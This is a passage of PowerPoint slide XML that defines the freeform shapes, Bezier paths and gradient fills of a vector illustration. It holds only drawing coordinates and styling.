                      <a:gd name="T22" fmla="*/ 21 w 87"/>
                      <a:gd name="T23" fmla="*/ 0 h 185"/>
                      <a:gd name="T24" fmla="*/ 6 w 87"/>
                      <a:gd name="T25" fmla="*/ 26 h 185"/>
                      <a:gd name="T26" fmla="*/ 6 w 87"/>
                      <a:gd name="T27" fmla="*/ 107 h 185"/>
                      <a:gd name="T28" fmla="*/ 1 w 87"/>
                      <a:gd name="T29" fmla="*/ 99 h 185"/>
                      <a:gd name="T30" fmla="*/ 0 w 87"/>
                      <a:gd name="T31" fmla="*/ 159 h 185"/>
                      <a:gd name="T32" fmla="*/ 10 w 87"/>
                      <a:gd name="T33" fmla="*/ 170 h 185"/>
                      <a:gd name="T34" fmla="*/ 61 w 87"/>
                      <a:gd name="T35" fmla="*/ 184 h 185"/>
                      <a:gd name="T36" fmla="*/ 87 w 87"/>
                      <a:gd name="T37" fmla="*/ 164 h 185"/>
                      <a:gd name="T38" fmla="*/ 87 w 87"/>
                      <a:gd name="T39" fmla="*/ 103 h 18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87" h="185">
                        <a:moveTo>
                          <a:pt x="87" y="103"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="113"/>
                          <a:pt x="72" y="121"/>
                          <a:pt x="63" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="122"/>
                          <a:pt x="63" y="122"/>
                          <a:pt x="63" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="122"/>
                          <a:pt x="63" y="51"/>
                          <a:pt x="63" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="30"/>
                          <a:pt x="71" y="15"/>
                          <a:pt x="76" y="15"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="12"/>
                          <a:pt x="63" y="12"/>
                          <a:pt x="63" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="12"/>
                          <a:pt x="50" y="26"/>
                          <a:pt x="49" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="49"/>
                          <a:pt x="49" y="118"/>
                          <a:pt x="49" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="116"/>
                          <a:pt x="28" y="112"/>
                          <a:pt x="19" y="110"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="108"/>
                          <a:pt x="18" y="39"/>
                          <a:pt x="18" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="18"/>
                          <a:pt x="27" y="3"/>
                          <a:pt x="31" y="3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16" y="0"/>
                          <a:pt x="7" y="15"/>
                          <a:pt x="6" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5" y="37"/>
                          <a:pt x="6" y="100"/>
                          <a:pt x="6" y="107"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="105"/>
                          <a:pt x="2" y="102"/>
                          <a:pt x="1" y="99"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="119"/>
                          <a:pt x="0" y="141"/>
                          <a:pt x="0" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="164"/>
                          <a:pt x="4" y="169"/>
                          <a:pt x="10" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="22" y="172"/>
                          <a:pt x="53" y="182"/>
                          <a:pt x="61" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="69" y="185"/>
                          <a:pt x="85" y="176"/>
                          <a:pt x="87" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="87" y="144"/>
                          <a:pt x="87" y="123"/>
                          <a:pt x="87" y="103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ED563"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FED563">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FED563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592"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2114" y="2500"/>
                    <a:ext cx="88" cy="55"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 9 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 15 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 30 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="9" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="15" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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Oval 593"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2108" y="2431"/>
                    <a:ext cx="106" cy="105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594"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2108" y="2429"/>
                    <a:ext cx="128" cy="68"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 54 w 94"/>
                      <a:gd name="T1" fmla="*/ 1 h 50"/>
                      <a:gd name="T2" fmla="*/ 49 w 94"/>
                      <a:gd name="T3" fmla="*/ 1 h 50"/>
                      <a:gd name="T4" fmla="*/ 48 w 94"/>
                      <a:gd name="T5" fmla="*/ 1 h 50"/>
                      <a:gd name="T6" fmla="*/ 44 w 94"/>
                      <a:gd name="T7" fmla="*/ 2 h 50"/>
                      <a:gd name="T8" fmla="*/ 43 w 94"/>
                      <a:gd name="T9" fmla="*/ 3 h 50"/>
                      <a:gd name="T10" fmla="*/ 39 w 94"/>
                      <a:gd name="T11" fmla="*/ 4 h 50"/>
                      <a:gd name="T12" fmla="*/ 39 w 94"/>
                      <a:gd name="T13" fmla="*/ 4 h 50"/>
                      <a:gd name="T14" fmla="*/ 35 w 94"/>
                      <a:gd name="T15" fmla="*/ 6 h 50"/>
                      <a:gd name="T16" fmla="*/ 34 w 94"/>
                      <a:gd name="T17" fmla="*/ 7 h 50"/>
                      <a:gd name="T18" fmla="*/ 31 w 94"/>
                      <a:gd name="T19" fmla="*/ 9 h 50"/>
                      <a:gd name="T20" fmla="*/ 30 w 94"/>
                      <a:gd name="T21" fmla="*/ 10 h 50"/>
                      <a:gd name="T22" fmla="*/ 21 w 94"/>
                      <a:gd name="T23" fmla="*/ 20 h 50"/>
                      <a:gd name="T24" fmla="*/ 21 w 94"/>
                      <a:gd name="T25" fmla="*/ 21 h 50"/>
                      <a:gd name="T26" fmla="*/ 21 w 94"/>
                      <a:gd name="T27" fmla="*/ 21 h 50"/>
                      <a:gd name="T28" fmla="*/ 20 w 94"/>
                      <a:gd name="T29" fmla="*/ 23 h 50"/>
                      <a:gd name="T30" fmla="*/ 20 w 94"/>
                      <a:gd name="T31" fmla="*/ 23 h 50"/>
                      <a:gd name="T32" fmla="*/ 0 w 94"/>
                      <a:gd name="T33" fmla="*/ 35 h 50"/>
                      <a:gd name="T34" fmla="*/ 10 w 94"/>
                      <a:gd name="T35" fmla="*/ 34 h 50"/>
                      <a:gd name="T36" fmla="*/ 16 w 94"/>
                      <a:gd name="T37" fmla="*/ 36 h 50"/>
                      <a:gd name="T38" fmla="*/ 20 w 94"/>
                      <a:gd name="T39" fmla="*/ 37 h 50"/>
                      <a:gd name="T40" fmla="*/ 40 w 94"/>
                      <a:gd name="T41" fmla="*/ 48 h 50"/>
                      <a:gd name="T42" fmla="*/ 57 w 94"/>
                      <a:gd name="T43" fmla="*/ 40 h 50"/>
                      <a:gd name="T44" fmla="*/ 94 w 94"/>
                      <a:gd name="T45" fmla="*/ 34 h 50"/>
                      <a:gd name="T46" fmla="*/ 54 w 94"/>
                      <a:gd name="T47" fmla="*/ 1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4" h="50">
                        <a:moveTo>
                          <a:pt x="54" y="1"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="52" y="1"/>
                          <a:pt x="51" y="1"/>
                          <a:pt x="49" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="1"/>
                          <a:pt x="48" y="1"/>
                          <a:pt x="48" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="47" y="2"/>
                          <a:pt x="46" y="2"/>
                          <a:pt x="44" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="2"/>
                          <a:pt x="44" y="2"/>
                          <a:pt x="43" y="3"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="3"/>
                          <a:pt x="41" y="3"/>
                          <a:pt x="39" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="4"/>
                          <a:pt x="39" y="4"/>
                          <a:pt x="39" y="4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5" y="6"/>
                          <a:pt x="35" y="7"/>
                          <a:pt x="34" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="7"/>
                          <a:pt x="32" y="8"/>
                          <a:pt x="31" y="9"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="9"/>
                          <a:pt x="31" y="9"/>
                          <a:pt x="30" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="13"/>
                          <a:pt x="24" y="16"/>
                          <a:pt x="21" y="20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1" y="22"/>
                          <a:pt x="20" y="22"/>
                          <a:pt x="20" y="23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17" y="27"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="0" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="32"/>
                          <a:pt x="6" y="33"/>
                          <a:pt x="10" y="34"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="34"/>
                          <a:pt x="14" y="35"/>
                          <a:pt x="16" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="36"/>
                          <a:pt x="19" y="37"/>
                          <a:pt x="20" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="41"/>
                          <a:pt x="34" y="50"/>
                          <a:pt x="40" y="48"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="48"/>
                          <a:pt x="51" y="40"/>
                          <a:pt x="57" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="41"/>
                          <a:pt x="94" y="34"/>
                          <a:pt x="94" y="34"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="14"/>
                          <a:pt x="74" y="0"/>
                          <a:pt x="54" y="1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ED563"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FED563">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FED563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02" name="Group 595"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1388" y="2942"/>
                  <a:ext cx="180" cy="130"/>
                  <a:chOff x="2204" y="1289"/>
                  <a:chExt cx="468" cy="338"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="403" name="Freeform 596"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2204" y="1367"/>
                    <a:ext cx="338" cy="224"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 338"/>
                      <a:gd name="T1" fmla="*/ 224 h 224"/>
                      <a:gd name="T2" fmla="*/ 0 w 338"/>
                      <a:gd name="T3" fmla="*/ 90 h 224"/>
                      <a:gd name="T4" fmla="*/ 338 w 338"/>
                      <a:gd name="T5" fmla="*/ 0 h 224"/>
                      <a:gd name="T6" fmla="*/ 338 w 338"/>
                      <a:gd name="T7" fmla="*/ 135 h 224"/>
                      <a:gd name="T8" fmla="*/ 0 w 338"/>
                      <a:gd name="T9" fmla="*/ 224 h 224"/>
                      <a:gd name="T10" fmla="*/ 0 w 338"/>
                      <a:gd name="T11" fmla="*/ 224 h 2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38" h="224">
                        <a:moveTo>
                          <a:pt x="0" y="224"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="90"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="338" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="338" y="135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="224"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="224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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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4" name="Freeform 597"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2542" y="1289"/>
                    <a:ext cx="130" cy="246"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 83 w 130"/>
                      <a:gd name="T1" fmla="*/ 10 h 246"/>
                      <a:gd name="T2" fmla="*/ 83 w 130"/>
                      <a:gd name="T3" fmla="*/ 10 h 246"/>
                      <a:gd name="T4" fmla="*/ 47 w 130"/>
                      <a:gd name="T5" fmla="*/ 0 h 246"/>
                      <a:gd name="T6" fmla="*/ 0 w 130"/>
                      <a:gd name="T7" fmla="*/ 78 h 246"/>
                      <a:gd name="T8" fmla="*/ 0 w 130"/>
                      <a:gd name="T9" fmla="*/ 213 h 246"/>
                      <a:gd name="T10" fmla="*/ 130 w 130"/>
                      <a:gd name="T11" fmla="*/ 246 h 246"/>
                      <a:gd name="T12" fmla="*/ 130 w 130"/>
                      <a:gd name="T13" fmla="*/ 111 h 246"/>
                      <a:gd name="T14" fmla="*/ 130 w 130"/>
                      <a:gd name="T15" fmla="*/ 111 h 246"/>
                      <a:gd name="T16" fmla="*/ 83 w 130"/>
                      <a:gd name="T17" fmla="*/ 10 h 2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30" h="246">
                        <a:moveTo>
                          <a:pt x="83" y="10"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="83" y="10"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="47" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="78"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="213"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="130" y="246"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="130" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="130" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="83" y="1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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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5" name="Freeform 598"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2332" y="1400"/>
                    <a:ext cx="340" cy="227"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 340"/>
                      <a:gd name="T1" fmla="*/ 227 h 227"/>
                      <a:gd name="T2" fmla="*/ 0 w 340"/>
                      <a:gd name="T3" fmla="*/ 92 h 227"/>
                      <a:gd name="T4" fmla="*/ 340 w 340"/>
                      <a:gd name="T5" fmla="*/ 0 h 227"/>
                      <a:gd name="T6" fmla="*/ 340 w 340"/>
                      <a:gd name="T7" fmla="*/ 135 h 227"/>
                      <a:gd name="T8" fmla="*/ 0 w 340"/>
                      <a:gd name="T9" fmla="*/ 227 h 227"/>
                      <a:gd name="T10" fmla="*/ 0 w 340"/>
                      <a:gd name="T11" fmla="*/ 227 h 2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40" h="227">
                        <a:moveTo>
                          <a:pt x="0" y="227"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="92"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="340" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="340" y="135"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="227"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="227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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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6" name="Freeform 599"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2259" y="1337"/>
                    <a:ext cx="352" cy="106"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 147 w 149"/>
                      <a:gd name="T1" fmla="*/ 2 h 45"/>
                      <a:gd name="T2" fmla="*/ 144 w 149"/>
                      <a:gd name="T3" fmla="*/ 0 h 45"/>
                      <a:gd name="T4" fmla="*/ 2 w 149"/>
                      <a:gd name="T5" fmla="*/ 38 h 45"/>
                      <a:gd name="T6" fmla="*/ 2 w 149"/>
                      <a:gd name="T7" fmla="*/ 43 h 45"/>
                      <a:gd name="T8" fmla="*/ 5 w 149"/>
                      <a:gd name="T9" fmla="*/ 44 h 45"/>
                      <a:gd name="T10" fmla="*/ 147 w 149"/>
                      <a:gd name="T11" fmla="*/ 6 h 45"/>
                      <a:gd name="T12" fmla="*/ 147 w 149"/>
                      <a:gd name="T13" fmla="*/ 2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9" h="45">
                        <a:moveTo>
                          <a:pt x="147" y="2"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="146" y="0"/>
                          <a:pt x="144" y="0"/>
                          <a:pt x="144" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="38"/>
                          <a:pt x="2" y="38"/>
                          <a:pt x="2" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="38"/>
                          <a:pt x="0" y="39"/>
                          <a:pt x="2" y="43"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="45"/>
                          <a:pt x="5" y="44"/>
                          <a:pt x="5" y="44"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="147" y="6"/>
                          <a:pt x="147" y="6"/>
                          <a:pt x="147" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="147" y="6"/>
                          <a:pt x="149" y="5"/>
                          <a:pt x="147" y="2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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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7" name="Freeform 600"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2204" y="1381"/>
                    <a:ext cx="128" cy="246"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 83 w 128"/>
                      <a:gd name="T1" fmla="*/ 8 h 246"/>
                      <a:gd name="T2" fmla="*/ 83 w 128"/>
                      <a:gd name="T3" fmla="*/ 8 h 246"/>
                      <a:gd name="T4" fmla="*/ 48 w 128"/>
                      <a:gd name="T5" fmla="*/ 0 h 246"/>
                      <a:gd name="T6" fmla="*/ 0 w 128"/>
                      <a:gd name="T7" fmla="*/ 76 h 246"/>
                      <a:gd name="T8" fmla="*/ 0 w 128"/>
                      <a:gd name="T9" fmla="*/ 210 h 246"/>
                      <a:gd name="T10" fmla="*/ 128 w 128"/>
                      <a:gd name="T11" fmla="*/ 246 h 246"/>
                      <a:gd name="T12" fmla="*/ 128 w 128"/>
                      <a:gd name="T13" fmla="*/ 111 h 246"/>
                      <a:gd name="T14" fmla="*/ 128 w 128"/>
                      <a:gd name="T15" fmla="*/ 111 h 246"/>
                      <a:gd name="T16" fmla="*/ 83 w 128"/>
                      <a:gd name="T17" fmla="*/ 8 h 2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28" h="246">
                        <a:moveTo>
                          <a:pt x="83" y="8"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="83" y="8"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="48" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="76"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="210"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="128" y="246"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="128" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="128" y="111"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="83" y="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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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8" name="Freeform 601"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2261" y="1424"/>
                    <a:ext cx="17" cy="19"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 6 w 7"/>
                      <a:gd name="T1" fmla="*/ 7 h 8"/>
                      <a:gd name="T2" fmla="*/ 1 w 7"/>
                      <a:gd name="T3" fmla="*/ 5 h 8"/>
                      <a:gd name="T4" fmla="*/ 1 w 7"/>
                      <a:gd name="T5" fmla="*/ 1 h 8"/>
                      <a:gd name="T6" fmla="*/ 5 w 7"/>
                      <a:gd name="T7" fmla="*/ 2 h 8"/>
                      <a:gd name="T8" fmla="*/ 6 w 7"/>
                      <a:gd name="T9" fmla="*/ 7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8">
                        <a:moveTo>
                          <a:pt x="6" y="7"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="4" y="8"/>
                          <a:pt x="3" y="7"/>
                          <a:pt x="1" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="4"/>
                          <a:pt x="0" y="2"/>
                          <a:pt x="1" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="0"/>
                          <a:pt x="4" y="1"/>
                          <a:pt x="5" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="4"/>
                          <a:pt x="7" y="6"/>
                          <a:pt x="6" y="7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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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57" name="Group 602"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3863" y="2433"/>
                <a:ext cx="487" cy="339"/>
                <a:chOff x="1704" y="2914"/>
                <a:chExt cx="1483" cy="1032"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="358" name="Group 603"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1704" y="2914"/>
                  <a:ext cx="1483" cy="1032"/>
                  <a:chOff x="-1496" y="3101"/>
                  <a:chExt cx="4084" cy="2842"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="360" name="Freeform 604"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2087" y="4070"/>
                    <a:ext cx="168" cy="484"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 168"/>
                      <a:gd name="T1" fmla="*/ 484 h 484"/>
                      <a:gd name="T2" fmla="*/ 0 w 168"/>
                      <a:gd name="T3" fmla="*/ 45 h 484"/>
                      <a:gd name="T4" fmla="*/ 168 w 168"/>
                      <a:gd name="T5" fmla="*/ 0 h 484"/>
                      <a:gd name="T6" fmla="*/ 168 w 168"/>
                      <a:gd name="T7" fmla="*/ 442 h 484"/>
                      <a:gd name="T8" fmla="*/ 0 w 168"/>
                      <a:gd name="T9" fmla="*/ 484 h 4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8" h="484">
                        <a:moveTo>
                          <a:pt x="0" y="484"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="442"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="484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1" name="Freeform 605"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2057" y="4108"/>
                    <a:ext cx="30" cy="446"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 30"/>
                      <a:gd name="T1" fmla="*/ 7 h 446"/>
                      <a:gd name="T2" fmla="*/ 0 w 30"/>
                      <a:gd name="T3" fmla="*/ 0 h 446"/>
                      <a:gd name="T4" fmla="*/ 0 w 30"/>
                      <a:gd name="T5" fmla="*/ 439 h 446"/>
                      <a:gd name="T6" fmla="*/ 30 w 30"/>
                      <a:gd name="T7" fmla="*/ 446 h 446"/>
                      <a:gd name="T8" fmla="*/ 30 w 30"/>
                      <a:gd name="T9" fmla="*/ 7 h 4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" h="446">
                        <a:moveTo>
                          <a:pt x="30" y="7"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
